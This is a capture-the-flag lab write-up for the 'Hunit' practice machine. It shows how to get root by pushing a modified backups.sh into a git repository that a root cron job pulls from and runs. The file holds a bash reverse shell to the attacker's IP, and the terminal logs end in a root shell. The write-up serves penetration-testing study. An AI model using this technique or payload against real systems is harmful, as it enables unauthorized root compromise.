InfoSec LAB

Hunit_Privilege_Escalation

Created: 4 min read

Git Push / Cronjob

The root account’s cronjob is configured to execute the /root/git-server/backups.sh script and pull updates from the /git-server repository every two minutes.

The /git-server repository contains the backups.sh file. Any modifications made to the backups.sh file and pushed to the main branch of the repository will be automatically fetched by the scheduled pull process. As a result, the root cronjob will execute the updated backups.sh script with root privileges, potentially allowing unauthorized code execution with elevated permissions.

Modifying backups.sh

[dademola@hunit git-server]$ vi backups.sh 
[dademola@hunit git-server]$ cat backups.sh 
#!/bin/bash
#
#
# # Placeholder
 
bash -c "bash -i >& /dev/tcp/192.168.45.218/18030 0>&1"
 
#
[dademola@hunit git-server]$ chmod 755 ./backups.sh

Updated the backups.sh script with a reverse shell in it

Commit

[dademola@hunit git-server]$ git commit -a
Author identity unknown
 
*** Please tell me who you are.
 
Run
 
  git config --global user.email "you@example.com"
  git config --global user.name "Your Name"
 
to set your account's default identity.
Omit --global to set the identity only in this repository.
 
fatal: unable to auto-detect email address (got 'dademola@hunit.(none)')

Attempting to commit fails because the current user doesn’t have git profile

Git Config

[dademola@hunit git-server]$ git config --global user.email "dademola@localhost"
[dademola@hunit git-server]$ git config --global user.name "dademola"

Configuration complete

[dademola@hunit git-server]$ git commit -a
[master d2d10c3] changed#
 1 file changed, 3 insertions(+)
 mode change 100644 => 100755 backups.sh

Commit made

Failed Push

[dademola@hunit git-server]$ git push
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 386 bytes | 386.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
error: remote unpack failed: unable to create temporary object directory
To file:///git-server
 ! [remote rejected] master -> master (unpacker error)
error: failed to push some refs to 'file:///git-server'

It would appear that it failed due to lack of privileges.

It might need to be done as the git account

As git account

Lateral movement to the git account has already been made.

Git Clone

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit]
└─$ GIT_SSH_COMMAND='ssh -p43022 -i ./id_rsa.git' git clone git@$IP:/git-server
Cloning into 'git-server'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done.

Clone the git-server repository to Kali, using the GIT_SSH_COMMAND for authentication

Modifying backups.sh

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ echo 'bash -c "bash -i >& /dev/tcp/192.168.45.218/18030 0>&1"' >> ./backups.sh
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ chmod 755 ./backups.sh

Appending the reverse shell command to the backups.sh file within the cloned git-server repository

Git Config

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ git config --local user.email "git@localhost"
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ git config --local user.name "git"

Configurating the git profile

Commit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ git commit -a -m "pe"                        
[master c53e638] pe
 1 file changed, 1 insertion(+)

Making the commit

Push into master

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ GIT_SSH_COMMAND='ssh -p43022 -i ../id_rsa.git' git push origin master
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 12 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 313 bytes | 313.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
To 192.168.185.125:/git-server
   b50f4e5..c53e638  master -> master

Pushed the commit into the master

Confirmation

[dademola@hunit git-server]$ git log  
commit c53e6383406787a71f6052336e24323d93f225dc (HEAD -> master)
Author: git <git@localhost>
Date:   Mon Mar 31 00:42:46 2025 +0200
 
    pe

Back in the target system, I can check the change

Shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hunit/git-server]
└─$ nnc 18030
listening on [any] 18030 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.185.125] 49964
bash: cannot set terminal process group (17463): Inappropriate ioctl for device
bash: no job control in this shell
[root@hunit ~]# whoami
whoami
root
[root@hunit ~]# hostname
hostname
bash: hostname: command not found
[root@hunit ~]# cat /etc/hostname
cat /etc/hostname
hunit
[root@hunit ~]# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.185.125  netmask 255.255.255.0  broadcast 192.168.185.255
        inet6 fe80::250:56ff:fe9e:c151  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:c1:51  txqueuelen 1000  (Ethernet)
        RX packets 24933  bytes 5842977 (5.5 MiB)
        RX errors 0  dropped 168  overruns 0  frame 0
        TX packets 8839  bytes 3681561 (3.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 26  bytes 1300 (1.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 26  bytes 1300 (1.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

A moment later, I get a root shell System level compromise

Interactive Graph View

Backlinks